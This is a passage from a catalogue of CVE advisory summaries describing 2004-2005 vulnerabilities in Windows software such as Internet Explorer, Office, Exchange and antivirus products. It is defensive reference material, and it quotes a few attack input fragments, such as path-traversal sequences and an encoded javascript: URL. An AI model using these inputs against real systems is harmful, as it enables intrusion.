via (1) a crafted packet in NDMLSRVR.DLL or (2) a request packet with an invalid (non-0) "Error Status" value, which triggers a null dereference. [CVE-2005-0771] VERITAS Backup Exec Server (beserver.exe) 9.0 through 10.0 for Windows allows remote unauthenticated attackers to modify the registry by calling methods to the RPC interface on TCP port 6106. [CVE-2005-0738] Stack consumption vulnerability in Microsoft Exchange Server 2003 SP1 allows users to cause a denial of service (hang) by deleting or moving a folder with deeply nested subfolders, which causes Microsoft Exchange Information Store service (Store.exe) to hang as a result of a large number of recursive calls. [CVE-2005-0688] Windows Server 2003 and XP SP2, with Windows Firewall turned off, allows remote attackers to cause a denial of service (CPU consumption) via a TCP packet with the SYN flag set and the same destination and source address and port, aka a reoccurrence of the "Land" vulnerability (CVE-1999-0016). [CVE-2005-0573] Gaim 1.1.3 on Windows systems allows remote attackers to cause a denial of service (client crash) via a file transfer in which the filename contains "(" or ")" (parenthesis) characters. [CVE-2005-0564] Stack-based buffer overflow in Microsoft Word 2000 and Word 2002, and Microsoft Works Suites 2000 through 2004, might allow remote attackers to execute arbitrary code via a .doc file with long font information. [CVE-2005-0563] Cross-site scripting (XSS) vulnerability in Microsoft Outlook Web Access (OWA) component in Exchange Server 5.5 allows remote attackers to inject arbitrary web script or HTML via an email message with an encoded javascript: URL ("jav&#X41sc&#0010 [CVE-2005-0558] Buffer overflow in Microsoft Word 2000, Word 2002, and Word 2003 allows remote attackers to execute arbitrary code via a crafted document. [CVE-2005-0555] Buffer overflow in the Content Advisor in Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to execute arbitrary code via a crafted Content Advisor file, aka "Content Advisor Memory Corruption Vulnerability." [CVE-2005-0554] Buffer overflow in the URL processor of Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a URL with a long hostname, aka "URL Parsing Memory Corruption Vulnerability." [CVE-2005-0553] Race condition in the memory management routines in the DHTML object processor in Microsoft Internet Explorer 5.01, 5.5, and 6 allows remote attackers to execute arbitrary code via a malicious web page or HTML e-mail, aka "DHTML Object Memory Corruption Vulnerability". [CVE-2005-0500] Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to spoof the domain name of a URL in a titlebar for a script-initiated popup window, which could facilitate phishing attacks. [CVE-2005-0452] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft ASP.NET (.Net) 1.0 and 1.1 to SP1 allow remote attackers to inject arbitrary HTML or web script via Unicode representations for ASCII fullwidth characters that are converted to normal ASCII characters, including ">" and "<". [CVE-2005-0425] Unknown vulnerability in IBM Websphere Application Server 5.0, 5.1, and 6.0 when running on Windows, allows remote attackers to obtain the source code for Java Server Pages (.jsp) via a crafted URL that causes the page to be processed by the file serving servlet instead of the JSP engine. [CVE-2005-0420] Microsoft Outlook Web Access (OWA), when used with Exchange, allows remote attackers to redirect users to arbitrary URLs for login via a link to the owalogon.asp application. [CVE-2005-0416] The Windows Animated Cursor (ANI) capability in Windows NT, Windows 2000 through SP4, Windows XP through SP1, and Windows 2003 allows remote attackers to execute arbitrary code via the AnimationHeaderBlock length field, which leads to a stack-based buffer overflow. [CVE-2005-0360] The Microsoft Log Sink Class ActiveX control in pkmcore.dll is marked as "safe for scripting" for Internet Explorer, which allows remote attackers to create or append to arbitrary files. [CVE-2005-0324] Infinite Mobile Delivery Webmail 2.6 allows remote attackers to gain sensitive information via an HTTP request that contains invalid characters for a Windows foldername, which reveals the path in an error message. [CVE-2005-0230] Firefox 1.0 does not prevent the user from dragging an executable file to the desktop when it has an image/gif content type but has a dangerous extension such as .bat or .exe, which allows remote attackers to bypass the intended restriction and execute arbitrary commands via malformed GIF files that can still be parsed by the Windows batch file parser, aka "firedragging." [CVE-2005-0148] Thunderbird before 0.9, when running on Windows systems, uses the default handler when processing javascript: links, which invokes Internet Explorer and may expose the Thunderbird user to vulnerabilities in the version of Internet Explorer that is installed on the user's system. NOTE: since the invocation between multiple products is a common practice, and the vulnerabilities inherent in multi-product interactions are not easily enumerable, this issue might be REJECTED in the future. [CVE-2005-0110] Internet Explorer 6 on Windows XP SP2 allows remote attackers to bypass the file download warning dialog and possibly trick an unknowledgeable user into executing arbitrary code via a web page with a body element containing an onclick tag, as demonstrated using the createElement function. [CVE-2005-0083] MySQL MaxDB 7.5.00 for Windows, and possibly earlier versions and other platforms, allows remote attackers to cause a denial of service (application crash) via invalid parameters to the (1) DBMCli_String::ReallocString, (2) DBMCli_String::operator, (3) DBMCli_Buffer::ForceResize, (4) DBMCli_Wizard::InstallDatabase, (5) DBMCli_Devspaces::Complete, (6) DBMWeb_TemplateWizard::askForWriteCountStep5, or (7) DBMWeb_DBMWeb::wizardDB functions, which triggers a null dereference. [CVE-2005-0057] The Hyperlink Object Library for Windows 98, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a crafted link that triggers an "unchecked buffer" in the library, possibly due to a buffer overflow. [CVE-2005-0051] The Server service (srvsvc.dll) in Windows XP SP1 and SP2 allows remote attackers to obtain sensitive information (users who are accessing resources) via an anonymous logon using a named pipe, which is not properly authenticated, aka the "Named Pipe Vulnerability." [CVE-2005-0050] The License Logging service for Windows NT Server, Windows 2000 Server, and Windows Server 2003 does not properly validate the length of messages, which leads to an "unchecked buffer" and allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code, aka the "License Logging Service Vulnerability." [CVE-2005-0049] Windows SharePoint Services and SharePoint Team Services for Windows Server 2003 does not properly validate an HTTP redirection query, which allows remote attackers to inject arbitrary HTML and web script via a cross-site scripting (XSS) attack, or to spoof the web cache. [CVE-2005-0047] Windows 2000, XP, and Server 2003 does not properly "validate the use of memory regions" for COM structured storage files, which allows attackers to execute arbitrary code, aka the "COM Structured Storage Vulnerability." [CVE-2005-0045] The Server Message Block (SMB) implementation for Windows NT 4.0, 2000, XP, and Server 2003 does not properly validate certain SMB packets, which allows remote attackers to execute arbitrary code via Transaction responses containing (1) Trans or (2) Trans2 commands, aka the "Server Message Block Vulnerability," and as demonstrated using Trans2 FIND_FIRST2 responses with large file name length fields. [CVE-2005-0044] The OLE component in Windows 98, 2000, XP, and Server 2003, and Exchange Server 5.0 through 2003, does not properly validate the lengths of messages for certain OLE data, which allows remote attackers to execute arbitrary code, aka the "Input Validation Vulnerability." [CVE-2004-2694] Microsoft Outlook Express 6.0 allows remote attackers to bypass intended access restrictions, load content from arbitrary sources into the Outlook context, and facilitate phishing attacks via a "BASE HREF" with the target set to "_top". [CVE-2004-2657] * DISPUTED Mozilla Firefox 1.5.0.1, and possibly other versions, preserves some records of user activity even after uninstalling, which allows local users who share a Windows profile to view the records after a new installation of Firefox, as reported for the list of Passwords Never Saved web sites. NOTE: The vendor has disputed this issue, stating that "The uninstaller is primarily there to uninstall the application. It is not there to uninstall user data. For the moment I will stick by my module-owner decision." [CVE-2004-2643] Directory traversal vulnerability in Microsoft cabarc allows remote attackers to overwrite files via "../" sequences in file names in a CAB archive. [CVE-2004-2635] An ActiveX control for McAfee Security Installer Control System 4.0.0.81 allows remote attackers to access the Windows registry via web pages that use the control's RegQueryValue() method. [CVE-2004-2628] Multiple directory traversal vulnerabilities in thttpd 2.07 beta 0.4, when running on Windows, allow remote attackers to read arbitrary files via a URL that contains (1) a hex-encoded backslash dot-dot sequence ("%5C..") or (2) a drive letter (such as "C:"). [CVE-2004-2609] The stuffit.com executable on Symantec PowerQuest DeployCenter 5.5 boot disks allows local users to obtain sensitive information (an unencrypted password for a Windows domain account) via four "stuffit /f:stuffit.dat" invocations, possibly due to a buffer overflow. [CVE-2004-2594] Absolute path traversal vulnerability in Quake II server before R1Q2 on Windows, as used in multiple products, allows remote attackers to read arbitrary files via a "\/" in a pathname argument, as demonstrated by "download \/server.cfg". [CVE-2004-2565] Multiple directory traversal vulnerabilities in Sambar Server 6.1 Beta 2 on Windows, and possibly other versions on Linux, when the administrative IP address restrictions have been modified from the default, allow remote authenticated users to read arbitrary files via (1) a "..\" (dot dot backslash) in the file parameter to showini.asp, or (2) an absolute path with drive letter in the log parameter to showlog.asp. [CVE-2004-2564] Multiple cross-site scripting (XSS) vulnerabilities in Sambar Server 6.1 Beta 2 on Windows, and possibly other versions on Linux, allow remote attackers to inject arbitrary web script or HTML via (1) the show parameter in show.asp and (2) the title parameter in showperf.asp. [CVE-2004-2555] Riverdeep FoolProof Security 3.9.x on Windows 98 and Windows ME uses weak cryptography (arithmetic and XOR operations) to relate the Control password to the Administrator password, which allows local users to calculate the Administrator password if they know the Control password and password recovery key. [CVE-2004-2482] Microsoft Outlook 2000 and 2003, when configured to use Microsoft Word 2000 or 2003 as the e-mail editor and when forwarding e-mail, does not properly handle an opening OBJECT tag that does not have a closing OBJECT tag, which causes Outlook to automatically download the URI in the data property of the OBJECT tag and might allow remote attackers to execute arbitrary code. [CVE-2004-2476] Microsoft Internet Explorer 6.0 allows remote attackers to cause a denial of service (infinite loop and crash) via an IFRAME with "?" as the file source. [CVE-2004-2442] Multiple interpretation error in various F-Secure Anti-Virus products, including Workstation 5.43 and earlier, Windows Servers 5.50 and earlier, MIMEsweeper 5.50 and earlier, Anti-Virus for Linux Servers and Gateways 4.61 and earlier, and other products, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on the target system. [CVE-2004-2434] Microsoft Internet Explorer 6.0 SP1 allows remote attackers to cause a denial of service (browser crash) via a link with "::{" (colon colon left brace), which triggers a null dereference when the user attempts to save the link using "Save As" and Internet Explorer prepares an error message with an attacker-controlled format string. [CVE-2004-2383] Microsoft Internet Explorer 5.0 through 6.0 allows remote attackers to bypass cross-frame scripting restrictions and capture keyboard events from other domains via an HTML document with Javascript that is outside a frameset that includes the target domain, then forcing the frameset to maintain focus. NOTE: the discloser claimed that the vendor does not categorize this as a vulnerability, but it can be used in a spoofing scenario [CVE-2004-2382] The PerfectNav plugin for Microsoft Internet Explorer allows remote attackers to cause a denial of service (browser crash) via a malformed URL such as "?". [CVE-2004-2379] Multiple cross-site scripting (XSS) vulnerabilities in @Mail 3.64 for Windows allow remote attackers to inject arbitrary web script or HTML via (1) the Displayed Name attribute in util.pl and (2) the Folder attribute in showmail.pl. [CVE-2004-2378] @Mail 3.64 for Windows allows remote attackers to cause a denial of service ("unusable" server) via a large number of POP3 connections to the server. [CVE-2004-2296] The preview_review function in the Reviews module in PHP-Nuke 6.0 to 7.3, when running on Windows systems, allows remote attackers to obtain sensitive information via an invalid date parameter, which generates an error message. [CVE-2004-2276] F-Secure Anti-Virus 5.41 and 5.42 on Windows, Client Security 5.50 and 5.52, 4.60 for Samba Servers, and 4.52 and earlier for Linux does not properly detect certain viruses in a PKZip archive, which allows viruses such as Sober.D and Sober.G to bypass initial detection. [CVE-2004-2220] F-Secure Anti-Virus for Microsoft Exchange 6.30 and 6.31 does not properly detect certain password-protected files in a ZIP file, which allows remote attackers to bypass anti-virus protection. [CVE-2004-2219] Microsoft Internet Explorer 6 allows remote attackers to spoof the address bar to facilitate phishing attacks via Javascript that uses an invalid URI, modifies the Location field, then uses history.back to navigate to the previous domain, aka NullyFake. [CVE-2004-2179] asycpict.dll, as used in Microsoft products such as Front Page 97 and 98, allows remote attackers to cause a denial of service (hang) via a JPEG image with maximum height and width values. [CVE-2004-2147] Unknown versions of Symantec Norton AntiVirus and Microsoft Outlook allow attackers to cause a denial of service (crash) via malformed e-mail messages (1) without a body or (2) without a carriage return ("\n") separating the headers from the body. [CVE-2004-2091] Microsoft Baseline Security Analyzer (MBSA) 1.2 does not correctly identify systems that have been patched but remain vulnerable to exploit until the system is rebooted, possibly giving the administrator a false sense of security. [CVE-2004-2090] Microsoft Internet Explorer 5.0.1 through 6.0 allows remote attackers to determine the existence of arbitrary files via the VBScript LoadPicture method, which returns an error code if the file does not exist. [CVE-2004-2070] The Altiris Client Service for Windows 5.6 SP1 Hotfix E (5.6.181) allows local users to execute arbitrary commands by opening the AClient tray icon and using the View Log File option, a different vulnerability than CVE-2005-1590. [CVE-2004-2022] ActivePerl 5.8.x and others, and Larry Wall's Perl 5.6.1 and others, when running on Windows systems, allows attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long argument to the system command, which leads to a stack-based buffer overflow. NOTE: it is unclear whether this bug is in Perl or the OS API that is used by Perl. [CVE-2004-2005] Buffer overflow in Eudora for Windows 5.2.1, 6.0.3, and 6.1 allows remote attackers to execute arbitrary code via an e-mail with (1) a link to a long URL to the C drive or (2) a long attachment name. [CVE-2004-1944] Eudora 6.1 and 6.0.3 for Windows allows remote attackers to cause a denial of service (crash) via a deeply nested multipart MIME message. [CVE-2004-1922] Microsoft Internet Explorer 5.5 and 6.0 allocates memory based on the memory size written in the BMP file instead of the actual BMP file size, which allows remote attackers to cause a denial of service (memory consumption) via a small BMP file with has a large memory size. [CVE-2004-1777] A "range check error" in Skype for Windows before 0.98.0.28 allows local and remote attackers to cause a denial of service (application crash) via long command line arguments or a long callto:// URL, a different vulnerability than CVE-2004-1114. [CVE-2004-1686] Internet Explorer 6.0 in Windows XP SP2 allows remote attackers to bypass the Information Bar prompt for ActiveX and Javascript via an XHTML page that contains an Internet Explorer formatted comment between the DOCTYPE tag and the HTML tag, as demonstrated using the DesignScience MathPlayer ActiveX plugin. [CVE-2004-1649] Buffer overflow in Microsoft Msinfo32.exe might allow local users to execute arbitrary code via a long filename in the msinfo_file command line parameter. NOTE: this issue might not cross security boundaries, so it may be REJECTED in the future. [CVE-2004-1623] The WAV file property handler in Windows XP SP1 allows remote attackers to cause a denial of service (infinite loop in Explorer) via a WAV file with an invalid file header whose fmt chunk length is set to 0xFFFFFFFF. [CVE-2004-1560] Microsoft SQL Server 7.0 allows remote attackers to cause a denial of service (mssqlserver service halt) via a long request to TCP port 1433, possibly triggering a buffer overflow. [CVE-2004-1527] Microsoft Internet Explorer 6.0 SP1 does not properly handle certain character strings in the Path attribute, which can cause it to modify cookies in other domains when the attacker's domain name is within the target's domain name or when wildcard DNS is being used, which allows remote attackers to hijack web sessions. [CVE-2004-1481] Integer overflow in pnen3260.dll in RealPlayer 8 through 10.5 (6.0.12.1040) and earlier, and RealOne Player 1 or 2 on Windows or Mac OS, allows remote attackers to execute arbitrary code via a SMIL file and a .rm movie file with a large length field for the data chunk, which leads to a heap-based buffer overflow. [CVE-2004-1380] Firefox before 1.0 and Mozilla before 1.7.5 allows inactive (background) tabs to launch dialog boxes, which can allow remote attackers to spoof the dialog boxes from web sites in other windows and facilitate phishing attacks, aka the "Dialog Box Spoofing Vulnerability." [CVE-2004-1376] Directory traversal vulnerability in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote malicious FTP servers to overwrite arbitrary files via .. (dot dot) sequences in filenames returned from a LIST command. [CVE-2004-1361] Integer underflow in winhlp32.exe in Windows NT, Windows 2000 through SP4, Windows XP through SP2, and Windows 2003 allows remote attackers to execute arbitrary code via a malformed .hlp file, which leads to a heap-based buffer overflow. [CVE-2004-1331] The execCommand method in Microsoft Internet Explorer 6.0 SP2 allows remote attackers to bypass the "File Download - Security Warning" dialog and save arbitrary files with arbitrary extensions via the SaveAs command. [CVE-2004-1322] Cisco Unity 2.x, 3.x, and 4.x, when integrated with Microsoft Exchange, has several hard coded usernames and passwords, which allows remote attackers to gain unauthorized access and change configuration settings or read outgoing or incoming e-mail messages. [CVE-2004-1317] Stack-based buffer overflow in doexec.c in Netcat for Windows 1.1, when running with the -e option, allows remote attackers to execute arbitrary code via a long DNS command. [CVE-2004-1312] A bug in the HTML parser in a certain Microsoft HTML library, as used in various third party products, may allow remote attackers to cause a denial of service via certain strings, as reported in GFI MailEssentials for Exchange 9 and 10, and GFI MailSecurity for Exchange 8, which causes emails to remain in IIS or Exchange mail queues. [CVE-2004-1306] Heap-based buffer overflow in winhlp32.exe in Windows NT, Windows 2000 through SP4, Windows XP through SP2, and Windows 2003 allows remote attackers to execute arbitrary code via a crafted .hlp file. [CVE-2004-1305] The Windows Animated Cursor (ANI) capability in Windows NT, Windows 2000 through SP4, Windows XP through SP1, and Windows 2003 allow remote attackers to cause a denial of service via (1) the frame number set to zero, which causes an invalid memory address to be used and leads to a kernel crash, or (2) the rate number set to zero, which leads to resource exhaustion and hang. [CVE-2004-1244] Windows Media Player 9 allows remote attackers to execute arbitrary code via a PNG file containing large (1) width or (2) height values, aka the "PNG Processing Vulnerability." [CVE-2004-1198] Microsoft Internet Explorer allows remote attackers to cause a denial of service (application crash from memory consumption), as demonstrated using Javascript code that continuously creates nested arrays and then sorts the newly created arrays. [CVE-2004-1166] CRLF injection vulnerability in Microsoft Internet Explorer 6.0.2800.1106 and earlier allows remote attackers to execute arbitrary FTP commands via an ftp:// URL that contains a URL-encoded newline ("%0a") before the FTP command, which causes the commands to be inserted into the resulting FTP session, as demonstrated using a PORT command. [CVE-2004-1155] Internet Explorer 5.01 through 6 allows remote attackers to spoof arbitrary web sites by injecting content from one window into another window whose name is known but resides in a different domain, as demonstrated using a pop-up window on a trusted web site, aka the "window injection" vulnerability. NOTE: later research shows that Internet Explorer 7 on Windows XP SP2 is also vulnerable. [CVE-2004-1134] Buffer overflow in the Microsoft W3Who ISAPI (w3who.dll) allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long query string. [CVE-2004-1133] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft W3Who ISAPI (w3who.dll) allow remote attackers to inject arbitrary HTML and web script via (1) HTTP headers such as "Connection" or (2) invalid parameters whose values are echoed in the resulting error message. [CVE-2004-1122] Safari 1.x to 1.2.4, and possibly other versions, allows inactive windows to launch dialog boxes, which can allow remote attackers to spoof the dialog boxes from web sites in other windows, aka the "Dialog Box Spoofing Vulnerability," a different vulnerability than CVE-2004-1314. [CVE-2004-1104] Microsoft Internet Explorer 6.0 SP2 allows remote attackers to spoof a legitimate URL in the status bar and conduct a phishing attack via a web page that contains a BASE element that points to the legitimate site, followed by an anchor (a) element with an empty "href" attribute, and a FORM whose action points to a malicious URL, and an INPUT submit element that is modified to look like a legitimate URL. [CVE-2004-1099] Cisco Secure Access Control Server for Windows (ACS Windows) and Cisco Secure Access Control Server Solution Engine (ACS Solution Engine) 3.3.1, when the EAP-TLS protocol is enabled, does not properly handle expired or untrusted certificates, which allows remote attackers to bypass authentication and gain unauthorized access via a "cryptographically correct" certificate with valid fields such as the username. [CVE-2004-1043] Internet Explorer 6.0 on Windows XP SP2 allows remote attackers to execute arbitrary code by using the "Related Topics" command in the Help ActiveX Control (hhctrl.ocx) to open a Help popup window containing the PCHealth tools.htm file in the local zone and injecting Javascript to be executed, as demonstrated using "writehta.txt" and the ADODB recordset, which saves a .HTA file to the local system, aka the "HTML Help ActiveX control Cross Domain Vulnerability." [CVE-2004-1038] A design error in the IEEE1394 specification allows attackers with physical access to a device to read and write to sensitive memory using a modified FireWire/IEEE 1394 client, thus bypassing intended restrictions that would normally require greater degrees of physical access to exploit. NOTE: this was reported in 2008 to affect Windows Vista, but some Linux-based operating systems have protection mechanisms against this attack. [CVE-2004-1023] Kerio Winroute Firewall before 6.0.9, ServerFirewall before 1.0.1, and MailServer before 6.0.5, when installed on Windows based systems, do not modify the ACLs for critical files, which allows local users with Power Users privileges to modify programs, install malicious DLLs in the plug-ins folder, and modify XML files related to configuration. [CVE-2004-0988] Integer overflow on Apple QuickTime before 6.5.2, when running on Windows systems, allows remote attackers to cause a denial of service (memory consumption) via certain inputs that cause a large memory operation. [CVE-2004-0985] Internet Explorer 6.x on Windows XP SP2 allows remote attackers to execute arbitrary code, as demonstrated using a document with a draggable file type such as .xml, .doc, .py, .cdf, .css, .pdf, or .ppt, and using ADODB.Connection and ADODB.recordset to write to a .hta file that is interpreted in the Local Zone by HTML Help. [CVE-2004-0979] Internet Explorer on Windows XP does not properly modify the "Drag and Drop or copy and paste files" setting when the user sets it to "Disable" or "Prompt," which may enable security-sensitive operations that are inconsistent with the user's intended configuration. [CVE-2004-0964] Buffer overflow in Zinf 2.2.1 on Windows, and other older versions for Linux, allows remote attackers or local users to execute arbitrary code via certain values in a .pls file. [CVE-2004-0963] Buffer overflow in Microsoft Word 2002 (10.6612.6714) SP3, and possibly other versions, allows remote attackers to cause a denial of service (application exception) and possibly execute arbitrary code in winword.exe via certain unexpected values in a .doc file, including (1) an offset that triggers an out-of-bounds memory access, (2) a certain value that causes a large memory copy as triggered by an integer conversion error, and other values. [CVE-2004-0937] Sophos Anti-Virus before 3.87.0, and Sophos Anti-Virus for Windows 95, 98, and Me before 3.88.0, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. [CVE-2004-0928] The Microsoft IIS Connector in JRun 4.0 and Macromedia ColdFusion MX 6.0, 6.1, and 6.1 J2EE allows remote attackers to bypass authentication and view source files, such as .asp, .pl, and .php files, via an HTTP request that ends in " [CVE-2004-0894] LSASS (Local Security Authority Subsystem Service) of Windows 2000 Server and Windows Server 2003 does not properly validate connection information, which allows local users to gain privileges via a specially-designed program. [CVE-2004-0893] The Local Procedure Call (LPC) interface of the Windows Kernel for Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 does not properly validate the lengths of messages sent to the LPC port, which allows local users to gain privileges, aka "Windows Kernel Vulnerability." [CVE-2004-0892] Microsoft Proxy Server 2.0 and Microsoft ISA Server 2000 (which is included in Small Business Server 2000 and Small Business Server 2003 Premium Edition) allows remote attackers to spoof trusted Internet content on a specially crafted webpage via spoofed reverse DNS lookup results. [CVE-2004-0848] Buffer overflow in Microsoft Office XP allows remote attackers to execute arbitrary code via a link with a URL file location containing long inputs after (1) "%00 (null byte) in .doc filenames or (2) "%0a" (carriage return) in .rtf filenames. [CVE-2004-0847] The Microsoft .NET forms authentication capability for ASP.NET allows remote attackers to bypass authentication for .aspx files in restricted directories via a request containing a (1) "\" (backslash) or (2) "%5C" (encoded backslash), aka "Path Validation Vulnerability." [CVE-2004-0846] Unknown vulnerability in Microsoft Excel 2000, 2002, 2001 for Mac, and v.X for Mac allows remote attackers to execute arbitrary code via a malicious file containing certain parameters that are not properly validated. [CVE-2004-0839] Internet Explorer in Windows XP SP2, and other versions including 5.01 and 5.5, allows remote attackers to install arbitrary programs via a web page that uses certain styles and the AnchorClick behavior, popup windows, and drag-and-drop capabilities to drop the program in the local startup folder, as demonstrated by "wottapoop.html". [CVE-2004-0830] The Content Scanner Server in F-Secure Anti-Virus for Microsoft Exchange 6.21 and earlier, F-Secure Anti-Virus for Microsoft Exchange 6.01 and earlier, and F-Secure Internet Gatekeeper 6.32 and earlier allow remote attackers to cause a denial of service (service crash due to unhandled exception) via a certain malformed packet. [CVE-2004-0829] smbd in Samba before 2.2.11 allows remote attackers to cause a denial of service (daemon crash) by sending a FindNextPrintChangeNotify request without a previous FindFirstPrintChangeNotify, as demonstrated by the SMB client in Windows XP SP2. [CVE-2004-0775] Buffer overflow in WIDCOMM Bluetooth Connectivity Software, as used in products such as BTStackServer 1.3.2.7 and 1.4.2.10, Windows XP and Windows 98 with MSI Bluetooth Dongles, and HP IPAQ 5450 running WinCE 3.0, allows remote attackers to execute arbitrary code via certain service requests. [CVE-2004-0774] RealNetworks Helix Universal Server 9.0.2 for Linux and 9.0.3 for Windows allows remote attackers to cause a denial of service (CPU and memory exhaustion) via a POST request with a Content-Length header set to -1. [CVE-2004-0728] The Remote Control Client service in Microsoft's Systems Management Server (SMS) 2.50.2726.0 allows remote attackers to cause a denial of service (crash) via a data packet to TCP port 2702 that causes the server to read or write to an invalid memory address. [CVE-2004-0723] Microsoft Java virtual machine (VM) 5.0.0.3810 allows remote attackers to bypass sandbox restrictions to read or write certain data between applets from different domains via the "GET/Key" and "PUT/Key/Value" commands, aka "cross-site Java." [CVE-2004-0719] Internet Explorer for Mac 5.2.3, Internet Explorer 6 on Windows XP, and possibly other versions, does not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability. [CVE-2004-0717] Opera 7.51 for Windows and 7.50 for Linux does not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability. [CVE-2004-0712] The configuration tools (1) config.sh in Unix or (2) config.cmd in Windows for BEA WebLogic Server 8.1 through SP2 create a log file that contains the administrative username and password in cleartext, which could allow local users to gain privileges. [CVE-2004-0610] The Web administration interface in Microsoft MN-500 Wireless Router allows remote attackers to cause a denial of service (connection refusal) via a large number of open HTTP connections. [CVE-2004-0573] Buffer overflow in the converter for Microsoft WordPerfect 5.x on Office 2000, Office XP, Office 2003, and Works Suites 2001 through 2004 allows remote attackers to execute arbitrary code via a malicious document or website. [CVE-2004-0572] Buffer overflow in the Windows Program Group Converter (grpconv.exe) may allow remote attackers to execute arbitrary code via a shell: URL with a long filename and a .grp extension, which is not properly handled when the shell capability launches grpconv.exe. [CVE-2004-0568] HyperTerminal application for Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 does not properly validate the length of a value that is saved in a session file, which allows remote attackers to execute arbitrary code via a malicious HyperTerminal session file (.ht), web site, or Telnet URL contained in an e-mail message, triggering a buffer overflow. [CVE-2004-0567] The Windows Internet Naming Service (WINS) in Windows NT Server 4.0 SP 6a, NT Terminal Server 4.0 SP 6, Windows 2000 Server SP3 and SP4, and Windows Server 2003 does not properly validate the computer name value in a WINS packet, which allows remote attackers to execute arbitrary code or cause a denial of service (server crash), which results in an "unchecked buffer" and possibly triggers a buffer overflow, aka the "Name Validation Vulnerability." [CVE-2004-0566] Integer overflow in imgbmp.cxx for Windows 2000 allows remote attackers to execute arbitrary code via a BMP image with a large bfOffBits value. [CVE-2004-0552] Sophos Small Business Suite 1.00 on Windows does not properly handle files whose names contain reserved MS-DOS device names such as (1) LPT1, (2) COM1, (3) AUX, (4) CON, or (5) PRN, which can allow malicious code to bypass detection when it is installed, copied, or executed. [CVE-2004-0484] mshtml.dll in Microsoft Internet Explorer 6.0.2800 allows remote attackers to cause a denial of service (crash) via a table containing a form that crosses multiple td elements, and whose "float: left" class is defined in a link to a CSS stylesheet after the end of the table, which may trigger a null dereference. [CVE-2004-0475] The showHelp function in Internet Explorer 6 on Windows XP Pro allows remote attackers to execute arbitrary local .CHM files via a double backward slash ("\\") before the target CHM file, as demonstrated using an "ms-its" URL to ntshared.chm. NOTE: this bug may overlap CVE-2003-1041. [CVE-2004-0473] Argument injection vulnerability in Opera before 7.50 does not properly filter "-" characters that begin a hostname in a telnet URI, which allows remote attackers to insert options to the resulting command line and overwrite arbitrary files via (1) the "-f" option on Windows XP or (2) the "-n" option on Linux. [CVE-2004-0420] The Windows Shell application in Windows 98, Windows ME, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code by spoofing the type of a file via a CLSID specifier in the filename, as demonstrated using Internet Explorer 6.0.2800.1106 on Windows XP. [CVE-2004-0380] The MHTML protocol handler in Microsoft Outlook Express 5.5 SP2 through Outlook Express 6 SP1 allows remote attackers to bypass domain restrictions and execute arbitrary code, as demonstrated on Internet Explorer using script in a compiled help (CHM) file that references the InfoTech Storage (ITS) protocol handlers such as (1) ms-its, (2) ms-itss, (3) its, or (4) mk:@MSITStore, aka the "MHTML URL Processing Vulnerability." [CVE-2004-0379] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft SharePoint Portal Server 2001 allow remote attackers to process arbitrary web content and steal cookies via certain server scripts. [CVE-2004-0284] Microsoft Internet Explorer 6.0, Outlook 2002, and Outlook 2003 allow remote attackers to cause a denial of service (CPU consumption), if "Do not save encrypted pages to disk" is disabled, via a web site or HTML e-mail that contains two null characters (%00) after the host name. [CVE-2004-0281] Caucho Technology Resin 2.1.12 allows remote attackers to gain sensitive information and view the contents of the /WEB-INF/ directory via an HTTP request for "WEB-INF..", which is equivalent to "WEB-INF" in Windows. [CVE-2004-0215] Microsoft Outlook Express 5.5 and 6 allows attackers to cause a denial of service (application crash) via a malformed e-mail header. [CVE-2004-0213] Utility Manager in Windows 2000 launches winhlp32.exe while Utility Manager is running with raised privileges, which allows local users to gain system privileges via a "Shatter" style attack that sends a Windows message to cause Utility Manager to launch winhlp32 by directly accessing the context sensitive help and bypassing the GUI, then sending another message to winhlp32 in order to open a user-selected file, a different vulnerability than CVE-2003-0908. [CVE-2004-0212] Stack-based buffer overflow in the Task Scheduler for Windows 2000 and XP, and Internet Explorer 6 on Windows NT 4.0, allows local or remote attackers to execute arbitrary code via a .job file containing long parameters, as demonstrated using Internet Explorer and accessing a .job file on an anonymous share. [CVE-2004-0205] Buffer overflow in Microsoft Internet Information Server (IIS) 4.0 allows local users to execute arbitrary code via the redirect function. [CVE-2004-0204] Directory traversal vulnerability in the web viewers for Business Objects Crystal Reports 9 and 10, and Crystal Enterprise 9 or 10, as used in Visual Studio .NET 2003 and Outlook 2003 with Business Contact Manager, Microsoft Business Solutions CRM 1.2, and other products, allows remote attackers to read and delete arbitrary files via ".." sequences in the dynamicimag argument to crystalimagehandler.aspx. [CVE-2004-0200] Buffer overflow in the JPEG (JPG) parsing engine in the Microsoft Graphic Device Interface Plus (GDI+) component, GDIPlus.dll, allows remote attackers to execute arbitrary code via a JPEG image with a small JPEG COM field length that is normalized to a large integer length before a memory copy operation. [CVE-2004-0197] Buffer overflow in Microsoft Jet Database Engine 4.0 allows remote attackers to execute arbitrary code via a specially-crafted database query. [CVE-2004-0123] Double free vulnerability in the ASN.1 library as used in Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service and possibly execute arbitrary code. [CVE-2004-0122] Microsoft MSN Messenger 6.0 and 6.1 does not properly handle certain requests, which allows remote attackers to read arbitrary files. [CVE-2004-0121] Argument injection vulnerability in Microsoft Outlook 2002 does not sufficiently filter parameters of mailto: URLs when using them as arguments when calling OUTLOOK.EXE, which allows remote attackers to use script 